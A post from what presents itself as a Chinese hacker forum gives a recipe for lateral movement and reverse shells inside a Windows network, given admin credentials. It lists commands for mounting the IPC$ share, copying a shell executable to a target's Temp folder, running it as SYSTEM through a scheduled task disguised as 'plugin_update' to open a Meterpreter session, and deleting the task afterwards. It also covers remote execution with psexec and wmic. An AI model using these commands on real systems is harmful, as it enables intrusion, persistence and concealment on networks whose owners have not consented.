• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

内网下常见的反弹shell


This Wind

Recommended Posts

内网下常见的反弹shell

在公众号上看到的文章,以前看过。没实验过,算是填坑吧

环境

要求:知道管理员凭证

windows server 2008:192.168.241.172
widnows server 2008 2:192.168.241.171
kali:192.168.241.174

 

老年ipc$

建立连接

net use \\<IP>\ipc$ /user:administrator "<password>

 

1PYJ2Q.png

复制shell到目标机

copy shell.exe \\<IP>\C$\windows\Temp\xxx.exe

 

1PYwV0.png

创建服务并运行

schtasks /create /tn "plugin_update" /tr C:\Windows\Temp\xxx.exe /sc one /st <time> /S <IP> /RU System
schtasks /run /tn "plugin_update" /S <IP>

 

1PYgM9.png
1PYha6.png

反弹到的meterpreter

1PY7xH.png

执行完之后删除任务

schtasks /delete /tn "plugin_update" /S <IP>

 

1PYqsA.png

psexec

psexec \\<IP> -u <username> -p <password> <command> #执行命令等待进程终止,并返回结果
psexec -accepteula \\<IP> -d -u <username> -p <password> <command> #执行命令不过等结果,无交互
accepteula:此标志禁止显示“许可证”对话框
-d:不要等待进程终止(非交互式)

 

1PtMQJ.png

无交互式不回显

1PtlLR.png

wmic (非交互式)

wmic /node:<IP> /user:<username> /password:<password> process call create <command>

 

1Pt5mn.png
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now